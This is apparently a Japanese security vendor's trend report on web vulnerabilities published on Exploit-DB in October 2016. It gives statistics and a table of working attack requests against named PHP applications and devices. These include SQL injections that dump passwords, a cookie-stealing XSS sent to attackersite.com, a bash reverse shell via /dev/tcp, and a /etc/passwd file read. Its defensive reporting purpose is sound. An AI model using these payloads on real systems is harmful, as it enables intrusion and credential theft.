1. 脆弱性別件数
脆弱性カテゴリ 件数
ファイルアップロード
(File Upload) 1 ローカルファイル挿入 (Local File Inclusion:LFI) 2 リモートコマンド インジェクション (Remote Command Execution) 1
SQL インジェクション
(SQL Injection) 23 クロスサイトスクリプティング (Cross Site Scripting : XSS) 21
合計 48 2. 危険度別件数 危険度 件数 割合 早急対応要 5 10.42% 高 43 89.58% 合計 48 100.00% 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 4 8.33% 中 9 18.75% 易 35 72.92% 合計 48 100.00% 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 InfraPower PPS-02-S Q213V1 4 PHP Image Database 2 PHP Business Directory 2 PHP Telephone Directory 2 Simple Blog PHP 2 Just Dial Clone 2 Zenbership 2 PHP Classifieds Rental Script 1 Simple Dynamic Web 1 Picosafe 1 Entrepreneur Job Portal Script 1 Thatware 1 Event Calendar PHP 1 PHP Press Release 1 Fashion Shopping Cart 1 School Full CBT 1
FreePBX 1
Simple Shopping Cart Application 1 Health Record System 1
Witbe 1
ApPHP MicroBlog 1 Categorizator 1
JonhCMS 1
Classifieds Rental Script 1 ApPHP MicroCMS 1 S9Y Serendipity 1 Just Dial Clone Script 1
CNDSOFT 1
Learning Management System 1 Simple Forum PHP 1
XhP CMS 1
Student Information System 1 Advance MLM Script 1 Web Based Alumni Tracking System 1 OpenCimetiere 1 Colorful Blog 1 B2B Portal Script 1 miniblog 1 MLM Unilevel Plan Script 1
合計 48 サマリー 2016年10月に公開されたExploit-DBの分析結果、SQLインジェクション攻撃に対する脆弱報告件数が最も多く、攻撃の種類も多数発見されました。SQLインジェクション攻撃は、最初は難易度が低い攻撃とし ても、一応脆弱性が発見されたら、その脆弱性を悪用して多様な攻撃ができる非常に高い危険度を持っている攻撃に属します。SQLインジェクションにさらされないためには、入力値の検証を厳密に実施するセキュ アコーディングが必須的に求められます。主なソフトウェアの脆弱性発生現況を見ると、10月にはCMSからPHPスクリプトまで多様なソフトウェアから脆弱性が発見されました。脆弱性が発見されたソフトウェアを使用 する管理者は、該当脆弱性の内容を必ず確認し、関連アップデートを実施して脆弱性にさらされないように注意しなければなりません。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム 1 2 1 23 21 0 5 10 15 20 25 ファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI)
リモートコマンド インジェクション (Remote Command Execution) SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting :
XSS) 脆弱性別件数 5 43 危険度別件数 早急対応要 高 4 9 35 攻撃実行の難易度別件数 難 中 易 4 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 11 1 11 1 1 11 11 1 1 11 1 主なソフトウェア別脆弱性発生件数 InfraPower PPS-02-S Q213V1 PHP Image Database PHP Business Directory PHP Telephone Directory Simple Blog PHP Just Dial Clone Zenbership PHP Classifieds Rental Script Simple Dynamic Web
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2016-10-05 40454 XSS 中 高 Picosafe Web Gui -filemanager.php XSS 脆弱性 /picosafe_webgui/webinterface/js/filemanager/filemanage r.php?directory=PHNjcmlwdD5hbGVydCgxKTs8L3Njcmlwd D4= Picosafe Picosafe Web Gui
2016-10-06 40468 SQL Injection 易 高 product.php SQL Injection 脆弱B2B Portal Script - view-性 /advancedb2b/view-product.php?pid=294%27%20AND%201754=1754%20 AND%20%27whqn%27=%27whqn B2B Portal Script B2B Portal Script
2016-10-06 40467 SQL Injection 易 高 PHP Classifieds Rental Script -Blind SQL Injection /product_details.php?refid=1319258872%27%20AND% 203912=3912%20AND%20%27HTMi%27=%27HTMi ClassifiedsPHP Rental Script PHP Classifieds Rental Script
2016-10-06 40466 SQL Injection 中 高 Advance MLM Script - SQL Injection /mlm/news_detail.php?newid=jMCtRq%27%20UNION% 20ALL%20SELECT%20NULL,CONCAT(0x71787a7a71,0x4 8755652787877617966627661486164744748424b6155 564f514370537747504c6e736876665150,0x717878717 1),NULL,NULL,NULL,NULL--%20Afye Advance MLM Script Advance MLM Script
2016-10-06 40470 SQL Injection 易 高 restaurants-details.php SQLJust Dial Clone Script -Injection 脆弱性
/jus/restaurants-details.php?fid=1%20and%201=1-- Just Dial Clone
Just Dial Clone Script
2016-10-06 40469 SQL Injection 難 早急対応要 MLM Unilevel Plan Script v1.0.2- news_detail.php SQL Injection 脆弱性 /news_detail.php?newid=11%27%20%2F*%2130000an d%20ascii%28substring%28%28database%28%29%29 %2C4%2C1%29%29%3C115%20and*%2F%20%27x %27%3D%27x MLM Unilevel Plan Script MLM Unilevel Plan Script v1.0.2 2016-10-06 40462 Remote Command Execution
中 早急対応要 Witbe - Remote Code Execution
POST /cgi-bin/applyConfig.pl HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
file=set|bash -i >& /dev/tcp/ 0>&1
Witbe Witbe
2016-10-06 40470 XSS 易 高 restaurants-details.php XXS 脆Just Dial Clone Script -弱性
/jus/restaurants-details.php?fid=<script>alert(1);</script>
Just Dial Clone
Just Dial Clone Script
2016-10-07 40479 SQL Injection 難 早急対応要 jobsearch_all.html SQL InjectionEntrepreneur Job Portal Script -脆弱性 /job-portal/jobsearch_all.html?cmpid=31453525536' AND (SELECT 8347 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8347=8347,1))),0x7178716b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjF'='tqjF
Entrepreneur Job Portal Script Entrepreneur Job Portal Script 2016-10-09 40480 XSS 中 高 miniblog 1.0.1 - admin.php XSS脆弱性 POST /miniblog/adm/admin.php?mode=add&id=%3Cbr%20/% 3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20 variable:%20post%20in%20%3Cb%3EC:\\\\xampp \\\\htdocs\\\\miniblog\\\\adm\\\\edit.p hp%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b% 3E%3Cbr%20/%3E HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 data[post_title]=<script>location.href = ‘ http://www.attackersite.com/stealer.php?cookie=’ +document.cookie;</script> miniblog miniblog 1.0.1 2016-10-09 40487 XSS 易 高 PHP Press Release -administration.php XSS 脆弱性 /phppressrelease/administration.php?pageaction=saverele ase&subaction=submit&dateday=&datemonthnewedit=&d ateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=denem e&categorynewedit=1&publish=active PHP Press Release PHP Press Release
2016-10-11 40505 XSS 易 高 ApPHP MicroBlog 1.0.2 -index.php XSS 脆弱性
POST /index.php?page=posts&post_id= HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 task=publish_comment&article_id=69&user_id=&commen t_user_name=<script>alert(7);</script>&comment_user_e [email protected]&comment_text=Besim& captcha_code=DKF8&btnSubmitPC=Publish your comment ApPHP MicroBlog ApPHP MicroBlog 1.0.2
2016-10-12 40513 SQL Injection 易 高 OpenCimetiere v3.0.0a5 -login.php SQL Injection 脆弱性
POST / HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 login.action.connect=Se%20connecter&came_from=&logi n=1%20and%201=1--&password=paSSw0rd OpenCimetier e OpenCimetier e v3.0.0-a5 2016.10.01~2016.10.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report
最新Web脆弱性トレンドレポート(2016.10)日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2016-10-12 40516 XSS 易 高 ApPHP MicroCMS 3.9.5 -index.php XSS 脆弱性
POST /index.php?page=posts&post_id= HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 comment_user_name=<svg/onload=prompt(7);//> ApPHP MicroCMS ApPHP MicroCMS 3.9.5
2016-10-12 40511 SQL Injection 易 高 Categorizator 0.3.1 - vote.php SQL Injection 脆弱性
/cms/categorizator/vote.php?id_site=1'%20and%20'1'='
1' Categorizator Categorizator
0.3.1
2016-10-13 40526 XSS 易 高 Colorful Blog - single.php XSS脆弱性
POST /single.php?kat=kat&url='post_name' HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 adsoyad=<script>alert('document.cookie')</script>&email= [email protected]&web=example.com&mesaj=Nice, blog post
Colorful Blog Colorful Blog
2016-10-13 40519 SQL Injection 易 高 Simple Blog PHP 2.0 -admin.php SQL Injection 脆弱性
/blog/admin.php?act=editPost&id=1'+order+by+999--+ Simple Blog PHP
Simple Blog PHP 2.0
2016-10-13 40518 XSS 易 高 Simple Blog PHP 2.0 - Multiple Vulnerabilities
POST /blog/admin.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 act= addPost&publish_date=2016-10-13 10:30:27&post_title=<script>alert('XssPoC')</script>&post _text=Hacked&post_limit=550 Simple Blog PHP Simple Blog PHP 2.0
2016-10-13 40530 SQL Injection 易 高 JonhCMS 4.5.1 - go.php SQL Injection 脆弱性
/go.php?id=1%20and%201=1-- JonhCMS JonhCMS 4.5.1 2016-10-13 40521 SQL Injection 易 高 Thatware 0.4.6 - friend.php SQL
Injection 脆弱性
/friend.php?sid=1%20and%201=1--Thatware Thatware0.4.6 2016-10-14 40531 SQL Injection 易 高 Simple Forum PHP 2.4
-admin.php SQL Injection 脆弱性
/admin.php?act=editPost&id=1'+order+by+999--+ Simple Forum PHP
Simple Forum PHP 2.4
2016-10-14 40547 SQL Injection 易 高 Health Record System 0.1 -signin.php SQL Injection 脆弱性
POST /signin.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 lgaid=admin' or '1'='1 Health Record System Health Record System 0.1
2016-10-14 40546 SQL Injection 中 高 dd.php SQL Injection 脆弱性Fashion Shopping Cart 0.1 - /admin/dd.php?q=-1%27%20union%20select%201,version()--+ Shopping CartFashion Fashion Shopping Cart
0.1
2016-10-14 40545 SQL Injection 易 高
Learning Management System 0.1 - login.php SQL Injection 脆
弱性
POST /admin/login.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username=admin' or '1'='1 Learning Management System Learning Management System 0.1
2016-10-14 40544 SQL Injection 中 高 page.php SQL Injection 脆弱性Simple Dynamic Web 0.1 - /page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+ Dynamic WebSimple Simple Dynamic Web
0.1 2016-10-14 40543 SQL Injection 中 高
Web Based Alumni Tracking System 0.1 -print_employed.php SQL Injection 脆弱性 /admin/print_employed.php?id=-2%27%20union%20select%201,concat(username,0x3a, password),3,4,5,6,7,8,9,10,11,12%20from%20user--+ Web Based Alumni Tracking System Web Based Alumni Tracking System 0.1
2016-10-14 40542 SQL Injection 易 高 (SIS) 0.1 - admin_login.php SQLStudent Information System Injection 脆弱性
POST /admin_login.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username=admin' or '1'='1 Student Information System Student Information System (SIS) 0.1 2016-10-16 40552 XSS 易 高 PHP Telephone Directory -index.php XSS 脆弱性 /index.php?key=<svg/onload=alert(1)> PHP Telephone Directory PHP Telephone Directory 2016-10-16 40552 XSS 易 高 PHP Telephone Directory -administration.php XSS 脆弱性 /administration.php?key=<svg/onload=alert(1)> PHP Telephone Directory PHP Telephone Directory 2016-10-17 40559 XSS 易 高 PHP Business Directory -index.php XSS 脆弱性 /index.php?key=<svg/onload=alert(1)>&location=<svg/onl
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2016.10.01~2016.10.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report
最新Web脆弱性トレンドレポート(2016.10)
2016-10-17 40558 SQL Injection 中 高 School Full CBT 0.1 - show.php SQL Injection 脆弱性 /show.php?show=-1%20union%20select%201,username,password,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,user(),database(),31,32%20from%20adminlogin--+ School Full CBT School Full CBT 0.1
2016-10-17 40555 SQL Injection 難 早急対応要 Application 0.1 - product-Simple Shopping Cart details.php SQL Injection 脆弱性 /shop/product-details.php?prodid=-80%27%20union%20select%201,2,concat(username,0x 3a,password),4,version(),user()%20from%20user--+ Simple Shopping Cart Application Simple Shopping Cart Application 0.1 2016-10-17 40554 XSS 易 高 PHP Image Database -index.php XSS 脆弱性 /index.php?dateyear=<svg/onload=alert(1)>&key=<svg/onl
oad=alert(2)> PHP ImageDatabase PHP ImageDatabase 2016-10-17 40554 XSS 易 高 PHP Image Database -administration.php XSS 脆弱性 /administration.php?dateyear=<svg/onload=alert(1)>&key =<svg/onload=alert(2)> PHP Image Database PHP Image Database 2016-10-17 40559 XSS 易 高 PHP Business Directory -administration.php XSS 脆弱性 /administration.php?key=<svg/onload=alert(1)>&location=
<svg/onload=alert(2)> PHP BusinessDirectory PHP BusinessDirectory
2016-10-19 40576 XSS 中 高 XhP CMS 0.5.1 - action.php XSS脆弱性 POST /action.php?module=users&action=process_general_confi g&box_id=29&page_id=0&basename=index.php&closewi ndow=&from_page=page=0&box_id=29&action=display_ site_settings&errcode=0 HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 frmPageTitle="accesskey=z onclick="alert& #40;document.domain) XhP CMS XhP CMS 0.5.1
2016-10-19 40575 File Upload 易 高 CNDSOFT 2.3 - index.php FileUpload 脆弱性
POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1 Host:
Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=---7dd10029908f2
---7dd10029908f2 Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream <? phpinfo(); ?>
---7dd10029908f2--CNDSOFT CNDSOFT 2.3
2016-10-20 40594 SQL Injection 易 高 Event Calendar PHP 1.5 -admin.php SQL Injection 脆弱性 /admin.php?act=options&cal_id=1'+order+by+20--+ Event Calendar PHP Event Calendar PHP 1.5
2016-10-20 40591 SQL Injection 難 早急対応要 viewproducts.php SQL InjectionClassifieds Rental Script -脆弱性 /viewproducts.php?catid=-9700%27%20OR%201%20GROUP%20BY%20CONCAT (0x717a627071,(SELECT%20(CASE%20WHEN%20(7055 =7055)%20THEN%201%20ELSE%200%20END)),0x716 a767871,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)# Classifieds Rental Script Classifieds Rental Script
2016-10-21 40612 SQL Injection 易 高 Just Dial Clone Script - category-view-list.php SQL Injection 脆弱 性
/category-view-list.php?srch=1%20and%201=1-- Just Dial Clone Script
Just Dial Clone Script
2016-10-21 40614 LFI 易 高 FreePBX 10.13.66 - ajax.php LFI脆弱性
POST /admin/ajax.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 destination=/../../../../../../var/www/html/0x4148.php&lan guage= FreePBX FreePBX 10.13.66 2016-10-23 40620 XSS 易 高 Zenbership 107 -form_process.php XSS 脆弱性 POST /zenbership/pp-functions/form_process.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 page=1&session=zen_0176e737b450bbd83f5fc1066&first _name=Besim&last_name=<Script>alert('ExploitDB')</Scrip t>&[email protected] Zenbership Zenbership 107 2016-10-23 40620 XSS 易 高 Zenbership 107 - event-add.phpXSS 脆弱性 POST /admin/cp-functions/event-add.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 event[name]=<Script>alert('Meryem-ExploitDB');</Script> Zenbership Zenbership107
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2016-10-28 40641 XSS 易 高 InfraPower PPS02S Q213V1 -FWUpgrade.php XSS 脆弱性
POST /FWUpgrade.php HTTP/1.1 Host:
Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=---7dd10029908f2
---7dd10029908f2 Content-Disposition: form-data; name="file"; filename="somefile.php<img src=x onerror=confirm(2)>" Content-Type: text/php t00t ---7dd10029908f2--InfraPower PPS-02-S Q213V1 InfraPower PPS-02-S Q213V1 2016-10-28 40641 XSS 易 高 InfraPower PPS02S Q213V1 -SensorDetails.php XSS 脆弱性 /SensorDetails.php?Menu=SST&DeviceID=C100"><script>a lert(1)</script> InfraPower PPS-02-S Q213V1 InfraPower PPS-02-S Q213V1 2016-10-28 40641 XSS 易 高 InfraPower PPS02S Q213V1 -SNMP.php XSS 脆弱性 POST /SNMP.php?Menu=SMP HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 SNMPAgent=Enable&CommuintyString=public&Commuint yWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254'; alert(3) InfraPower PPS-02-S Q213V1 InfraPower PPS-02-S Q213V1
2016-10-28 40642 LFI 易 高 InfraPower PPS-02-S Q213V1 -ListFile.php LFI 脆弱性 /ListFile.php?file=../../../../../../../etc/passwd InfraPowerPPS-02-S Q213V1
InfraPower PPS-02-S
Q213V1
2016-10-31 40650 XSS 易 高 serendipity_admin.php XSS 脆弱S9Y Serendipity 2.0.4 -性
POST /serendipity_admin.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 serendipity[body]=<Script>alert('Meryem ExploitDB')</Script> S9Y Serendipity S9Y Serendipity 2.0.4
